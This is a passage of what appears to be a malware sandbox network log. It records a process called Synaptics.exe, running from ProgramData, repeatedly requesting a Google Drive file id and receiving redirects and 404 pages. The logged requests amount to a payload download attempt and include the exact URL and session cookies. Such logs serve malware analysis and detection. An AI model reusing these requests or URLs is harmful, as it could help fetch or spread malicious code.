33 | 192.168.2.7 | 49944 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:16 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:16 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC6k0L1BJ6XhY57Ipo91YvSKzYOvBqIJ_Hm8cXvJCz_gJAqJxZFD4PNcMMxBSw8k4rTF0JdU8ZM
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:16 GMT
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-ltYDdk36jpTYIsuLe-uYgw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
2024-12-30 10:48:16 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:48:16 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="YPW7fSDXQyJnjE3U-P40GA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:48:16 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.7 | 49953 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:17 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=bWWimPFpGrpeChM6yW8CpvGPVv6yrbjRK0eN3_LjMzHTwb80_Q0DT0ian8zknRj9_GGPgwV59uu1e1qe5l1ZkmlCQ-aCgVEJ0EBW63qe4DmDCp9uNMwOMqRO4VTJens2XngEbFgR48_Qbw5g-4m3o-cHbDL-yQONhrctr5HWqIc12mjtQJ4TKxg
2024-12-30 10:48:17 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:17 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-m_mOhRNzqYAUKJpwRjspnw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.7 | 49954 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:17 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=bWWimPFpGrpeChM6yW8CpvGPVv6yrbjRK0eN3_LjMzHTwb80_Q0DT0ian8zknRj9_GGPgwV59uu1e1qe5l1ZkmlCQ-aCgVEJ0EBW63qe4DmDCp9uNMwOMqRO4VTJens2XngEbFgR48_Qbw5g-4m3o-cHbDL-yQONhrctr5HWqIc12mjtQJ4TKxg
2024-12-30 10:48:17 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:17 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-9GPguaFzYZgRN1of-AODnQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.7 | 49957 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:17 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:17 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC5LkxIxUAHF9S4ZJ6aJNwB27a63khB_y7-7HmIZPJ2Te1QJ-_-z-fjHAFRXLeZjlkbDfXQfqI8
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:17 GMT
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-oLGlhjwAtG6D2pZIkBBHcw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
2024-12-30 10:48:17 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:48:17 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="P82iRYPqn8u28hvDcozB9w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:48:17 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.7 | 49961 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:17 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.7 | 49966 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:18 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:19 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC5I8iq2-FymV487rp7AMr1OKl2h_fFfSbadES__PYRxVgMPt_eqn5gn8mX2G0YID1GX
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:18 GMT
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-AxYkkwW1RFqbhBvLU9FXSA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
2024-12-30 10:48:19 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:48:19 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="jDZAOr7sPoq3U-QJSzM-Ig">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:48:19 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.7 | 49962 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:18 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=bWWimPFpGrpeChM6yW8CpvGPVv6yrbjRK0eN3_LjMzHTwb80_Q0DT0ian8zknRj9_GGPgwV59uu1e1qe5l1ZkmlCQ-aCgVEJ0EBW63qe4DmDCp9uNMwOMqRO4VTJens2XngEbFgR48_Qbw5g-4m3o-cHbDL-yQONhrctr5HWqIc12mjtQJ4TKxg
2024-12-30 10:48:18 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:18 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-Ooz-IAEQ5QHMu439pUWFwg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.7 | 49965 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:18 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:19 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                        X-GUploader-UploadID: AFiumC7waJcEVsFm7yWuAecR2ImABYhUMctvZFS8bYAMU3PFSf8AFTu07n-UV_72mLEmP6pu
                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:19 GMT
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-kKsgcgLe4BMiGndcy36ReA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Content-Length: 1652
                                                                                                                                                        Server: UploadServer
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                        Connection: close
2024-12-30 10:48:19 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:48:19 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="UlBVBLXhNGBco0JX0YpviA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:48:19 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.7 | 49963 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:18 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=Fz-E11ZM6YjFGwBY8KCQ28eAwJauLQ9gLsUY7Y8z17km7g59imrP-l0rDAC1qgPXd_P4wphfP965G181-1iCoFlL0Tm12sJVd_xR6e52Py990_PjzF_LhukeQxYW1NdrSNRWqyGaCaYUxuGMH98UYJUWHJxAt1mkp0pu4rT7GriDqhHc6Z0SyPyT
2024-12-30 10:48:19 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:18 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-jZj12F3yN_qEh3Q7EIaomA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.7 | 49977 | 142.250.185.78 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:19 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Host: docs.google.com
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Cookie: NID=520=Fz-E11ZM6YjFGwBY8KCQ28eAwJauLQ9gLsUY7Y8z17km7g59imrP-l0rDAC1qgPXd_P4wphfP965G181-1iCoFlL0Tm12sJVd_xR6e52Py990_PjzF_LhukeQxYW1NdrSNRWqyGaCaYUxuGMH98UYJUWHJxAt1mkp0pu4rT7GriDqhHc6Z0SyPyT
2024-12-30 10:48:19 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                        Content-Type: application/binary
                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                        Pragma: no-cache
                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                        Date: Mon, 30 Dec 2024 10:48:19 GMT
                                                                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-SugqnpClGaplE156KkOsbQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                        Server: ESF
                                                                                                                                                        Content-Length: 0
                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.7 | 49979 | 142.250.186.161 | 443 | 7744 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:48:19 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                        Host: drive.usercontent.google.com
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        Cookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
2024-12-30 10:48:20 UTC | 1243 | IN | HTTP/1.1 404 Not Found
